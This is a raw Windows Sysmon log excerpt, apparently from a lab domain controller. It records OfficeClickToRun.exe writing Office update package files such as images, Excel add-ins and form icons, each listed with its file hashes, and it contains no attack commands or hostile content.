23542300x800000000000000068954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_ghost_profile_large.pngMD5=99BE21C24202A0D9A4D408F8B3EB6B3A,SHA256=FBA69CFE37FE0D80C9188934D486E0300E5D5F1DF818AD078E4522E3484F50B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_ghost_profile.pngMD5=CF352AA961FD771E782B06C8A6565982,SHA256=502F0A90BB2C5A51C1CE9AF6A480143E333C3983FE68B1503FB4A3047B42EBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_ghost_company.pngMD5=262888491AB52EEC0C0C930A549FB481,SHA256=16752B26C117D72A57B354D2E6DA44656536256A51EF36CF08B5E6CA91E6D3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\TPN.txtMD5=C925EC060C240DD2DCE2109AE5663749,SHA256=10922C2B3F7239F10C0DAB1E92132813BE027C4C142142493BA5C90FFB14563F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\lpc.win32.bundleMD5=766E167AFEE23D8580E635B337BD981E,SHA256=383D1F416B5D010958B11AF74164C88F2311932D4CE18721C7F5D463183AE37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.pngMD5=D7838C32A6505EDF01B3C9E4661EF745,SHA256=96FE970DCA25141CE337195748567EAFEEB7F6EDB4BA7919EF1948A05DF2CFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_logo_large.pngMD5=32280C53148B8347AE63ADD2385EB8BB,SHA256=3C9947ADB0429BC2B3EA52FAF11EE0134BFAF95F637C05D93BE1A02A90729C56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_logo.pngMD5=09432B6216C165D665680F77528377AD,SHA256=3969C485556F3E08C0DDC0874F9BF899C0F8000C4D2BDA8B3FAF65063F24A6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.pngMD5=C68093A7FFEB0050EEBCB2F8DA7B79E1,SHA256=76E56FD7F6DBE7DE8644C66C4FE374E97FB2477AE6F6D8FEFCA3F77B97D3759F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.pngMD5=99BE21C24202A0D9A4D408F8B3EB6B3A,SHA256=FBA69CFE37FE0D80C9188934D486E0300E5D5F1DF818AD078E4522E3484F50B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile.pngMD5=CF352AA961FD771E782B06C8A6565982,SHA256=502F0A90BB2C5A51C1CE9AF6A480143E333C3983FE68B1503FB4A3047B42EBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\images\default\linkedin_ghost_company.pngMD5=262888491AB52EEC0C0C930A549FB481,SHA256=16752B26C117D72A57B354D2E6DA44656536256A51EF36CF08B5E6CA91E6D3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\EUROTOOL.XLAMMD5=B47D6AA33C7695C08F96042C472C7FF3,SHA256=20E84CB8C03303EAE6B2F2E9A59DE71716C79947A198A0DF3268D625B1AA929C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\SOLVER\SOLVER32.DLLMD5=1769FD29298442DC7E5B78C67DEF0259,SHA256=FB3244C1EFBAC78BA6335F0A07C0D1B44BDA74A4A493259A2D17175DF4CA7A41,IMPHASH=7A9E5984063410A5E3C003B4390495BDtruetrue 23542300x800000000000000068940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\SOLVER\SOLVER.XLAMMD5=C7B6032E11567345D08DD46C4C85C741,SHA256=4E8FBB01558DDBEF87DF308F86B21D0FB52215CD822272D351E91F85352B866D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\Analysis\PROCDB.XLAMMD5=CEA209DC4A32B1F78E82B770631CA260,SHA256=1A333BBDD16765A9A069B3AE7F86F2C4C9E70118821D35116B350741962DEA43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\Analysis\FUNCRES.XLAMMD5=C8D1BF3BD34F059A0E08875FDC90C8C6,SHA256=1317A6CBB1C93FAB181B7995D844E444327CC506AE84ABB2A534418138D729CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\Analysis\ATPVBAEN.XLAMMD5=D1BAB0BF1CC10FDA0BFD4BA38AEB8702,SHA256=53E060DBB6507E8E7BC6642DB1AFE14E91C82083E82CBA85E54ED06A9A08485F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Library\Analysis\ANALYS32.XLLMD5=73CDB395A6E5A8903739659BE15C2916,SHA256=D7E93F195CDD21E5E36D8BB8757F9DDB05AA1D46B4F921BD0C099317F53EF9BC,IMPHASH=931B64286FD0DF0AE8401F8E2F470B40truetrue 23542300x800000000000000068935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_w1\WA104381125MD5=0520BAFFC5F6C3C1A2DFF66E43A8291E,SHA256=C21BAF2361C66A90D8D286F13A512E4C8514C769056AB4981BF401B26823F268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_FA000000050\FA000000050MD5=CC59ACC728BBA562F8C2149BBFA0A53A,SHA256=648B6BA420170519B85C6229DDD92947350D9B9957366BE5661BE3836077D4E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_FA000000011\FA000000011MD5=AF9F9DFF40CFFA3B0B0C438011DF1366,SHA256=BE5C37EB975A29075826E960CB811D3CEA95FE6704884068E24D3B3E8C8C136E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_FA000000009\FA000000009MD5=C8D831435D12D33228FC45DB3A268B33,SHA256=A860E033827CE4E39ECEE865F680F0B9A2A7BC928723368D9097A10C072BD941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_FA000000008\FA000000008MD5=3A33488A37E745975F4182AC7BEE2D7F,SHA256=F29077F74DABCC7781924E87F7AF76EA58F49884F3AC52FE67123C7FEE2A6B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_FA000000006\FA000000006MD5=5CC830029C5FA54C2164B23D21944E09,SHA256=2E8565C718986F24A1CE0B0F43A496374D2E3DE94FF28392BFA897CB129419BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f7\FA000000007MD5=076DA17371CF733B80C94ECDBB89C965,SHA256=8D1EFC687FFA121E511C4DA70038B282AF828922D0A59DFA49BFE78A25E9B248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f4\FA000000005MD5=0B61D3803DA7D242184CE6D7FA7124E4,SHA256=50658E48634EC2C4FBE3A98AC5099A25E03E74A68CC0BAB050E0F432298A317C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f33\FA000000033MD5=3F71F904B7C53B387D9AF57280D37A15,SHA256=A01B236854F8781B8DF1A507E9CF4068808D3F22E7D3D028532A8099E12E5ADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f3\FA000000003MD5=80B1F805BD7C38C87268C31DD60EFB3A,SHA256=C6C51682F44819E777476F76C2B9A9264DED765CAE9720967FEDB829A3E1A39E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f2\FA000000002MD5=40E997A655517CBAA2C893D1FCA40AD4,SHA256=77C53F60B0832B395CCCC7FBC3AA0786212C5055E3AFCCF3C9A56573E7EA9F9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FPA_f14\FA000000014MD5=98337EB879C9965A481AB5CC4C7C63DE,SHA256=5935B71212C78CD49E4AECCD2C80C1CD853E5704072F07382E62570EE84B229D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKUPD.CFGMD5=9BC8BAAB3894E1424CCFDFE5A6CDFA50,SHA256=933FB1FCD84FB2B9279423A0A3D412D766BAD8A36DAFC80090DCC2860E468BB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKS.ICOMD5=5BB49EEB6557EC5727ADB24084916377,SHA256=2B7EF07964508843CFD0AF4C13FFAF6BE9963BF28919AD48DDD8751958179486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKREQS.ICOMD5=B208AF908B892B190A7660F48A738BE9,SHA256=A0FB5A8737D2EC71FA39887FBEA1E85A68855DA8D2893E11CAA03F4330F40C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKREQL.ICOMD5=74A6D5803A9C071B1FA50C8A0DD66CC8,SHA256=F66B6E7C11725F1477FC11195A999C0D159D056E9F2DF9821C6ADDCDEC8B35CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKREQ.CFGMD5=718C1F059D65495D17B9D6DC32FE3F69,SHA256=B7CD4C8B1600AE029031ED5E606FAB546DF3580B15E02DF7FB87096FB601B982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKL.ICOMD5=3EDE80682A563D9A2BEB7D57137A93C2,SHA256=B2659A926F7B3AAAFD2AB0C4993C670215D91BEF49B0F876CB6A3A61EE3C8A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKDECS.ICOMD5=EE9DBE73CF40FBEBF919300AC61D7D9C,SHA256=4372299EB819702F8188A972A28E9E8B6AE03AF6F678323E16799BA735678782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKDECL.ICOMD5=B52E1A369C36DD7112AB8AA51FF93071,SHA256=307906B5AF5ECB42D228D404C03FB4B995EB9A24471910E113854F134F2DED93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKDEC.CFGMD5=42F2D037E27083E7AF3DF79549E05608,SHA256=83B8A4B23311026E6539CE99D53DD9092C9C6017AA5847DEA7BED7289D504BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKACCS.ICOMD5=585CDFB98F182CCA13462A8486277735,SHA256=919A1950377A61ABBD48EA4CACAACD1D7BBB9409E1C5C39CFC49C327D8FF0BD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKACCL.ICOMD5=3B85B6C19F8CD3AED92F448E573428BD,SHA256=41BE013BD98740AA8D0CC976FCA2167B4820450676D0ECD9502661091A4B7F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASKACC.CFGMD5=7D2AA9B711B873712F779993EC4E04A0,SHA256=2627B0802EAB57262E7623ADE1E5608E1B4F3F07F896DBE28384C022F20EC6B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\TASK.CFGMD5=9729309B81F03D028C26A43DF019602D,SHA256=718CB57118987B805459E5BC0E04E98646FE30D50E4B00AEFC9181B653591A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 